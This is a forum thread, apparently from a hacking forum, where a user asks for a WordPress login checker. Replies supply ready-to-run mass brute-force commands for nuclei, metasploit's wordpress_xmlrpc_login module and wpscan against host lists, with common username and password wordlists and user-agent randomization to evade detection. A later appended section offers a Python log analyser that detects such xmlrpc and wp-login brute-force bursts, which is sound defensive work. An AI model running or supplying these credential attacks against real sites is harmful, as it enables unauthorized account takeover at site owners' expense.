
Looking for WordPress checker.

You can use nuclei to do this with their xmlrpc brute-force template:

Bash:
nuclei -l hosts.txt -t nuclei-templates/http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml -o wp-logins.txt

wp-users.txt
user@host:~/nuclei-templates/helpers/wordlists# cat wp-users.txt
adm
admin
user
admin1
hostname
manager
qwerty
root
support
sysadmin
test
wp-passwords.txt
user@host:~/nuclei-templates/helpers/wordlists# cat wp-passwords.txt
admin
123456
password
12345678
666666
111111
1234567
qwerty
siteadmin
administrator
root
123123
123321
1234567890
letmein123
test123
demo123
pass123
123qwe
qwe123
654321
loveyou
adminadmin123
 
Another way to do it is by using metasploit:

Code:
msfconsole
msf6 > use auxiliary/scanner/http/wordpress_xmlrpc_login
set RHOSTS file:/home/user/hosts.txt
set RPORT 443
set SSL true
set USER_FILE file:/home/user/users.txt
set PASS_FILE file:/home/user/passwords.txt
set THREADS 10
run
 
Hello, xss.

I am looking for a working script to check wp-logins.
wpscan --url https://<YOUR_URL> --enumerate vt,vp,cb --random-user-agent --api-token <YOUR_API>
wpscan --url https://<YOUR_URL> -U <User> -P /path/to/dir/with/you/SecLists/Passwords/Leaked-Databases/rockyou-75.txt --random-user-agent --api-token <YOUR_API> --force
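Seen from the server side, the tools named in this thread all produce the same pattern: a burst of POSTs to `/xmlrpc.php` or `/wp-login.php` from one client. The following is an added example, not code from the thread or from any of those projects; it flags that burst in a web access log by source IP and path, so a randomized User-Agent does not hide it. It assumes Combined Log Format lines in time order, the threshold and window are assumed values, and the sample lines are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Combined Log Format: ip - - [time] "METHOD path proto" status size "referer" "user-agent"
LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)
AUTH_PATHS = ("/xmlrpc.php", "/wp-login.php")  # WordPress endpoints that accept credentials

def find_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {ip: {"hits": n, "user_agents": k}} for clients that sent at least
    `threshold` POSTs to an auth endpoint within `window`. Keyed on source IP
    and path only, so rotating the User-Agent header does not hide the burst."""
    recent = defaultdict(deque)   # ip -> timestamps inside the current window
    agents = defaultdict(set)     # ip -> user agents seen on auth POSTs
    flagged = {}
    for line in lines:
        m = LINE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        if not path.endswith(AUTH_PATHS):   # also matches installs in a subdirectory
            continue
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        q = recent[m["ip"]]
        q.append(ts)
        agents[m["ip"]].add(m["ua"])
        while ts - q[0] > window:           # drop requests older than the window
            q.popleft()
        if len(q) >= threshold:
            prev = flagged.get(m["ip"], {"hits": 0})
            flagged[m["ip"]] = {"hits": max(prev["hits"], len(q)),
                                "user_agents": len(agents[m["ip"]])}
    return flagged

# Constructed sample log (documentation addresses, not real traffic).
SAMPLE = [
    f'203.0.113.7 - - [10/Mar/2024:12:00:{s:02d} +0000] "POST /xmlrpc.php HTTP/1.1" 200 403 "-" "UA-{s}"'
    for s in range(0, 12, 2)
] + [
    '198.51.100.4 - - [10/Mar/2024:12:00:05 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [10/Mar/2024:12:09:41 +0000] "GET /xmlrpc.php HTTP/1.1" 405 42 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, info in find_bruteforce(SAMPLE).items():
        print(ip, info)
```

A high `user_agents` count next to a high `hits` count for a single address is itself a useful signal, since ordinary clients do not change browser between login attempts.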
 

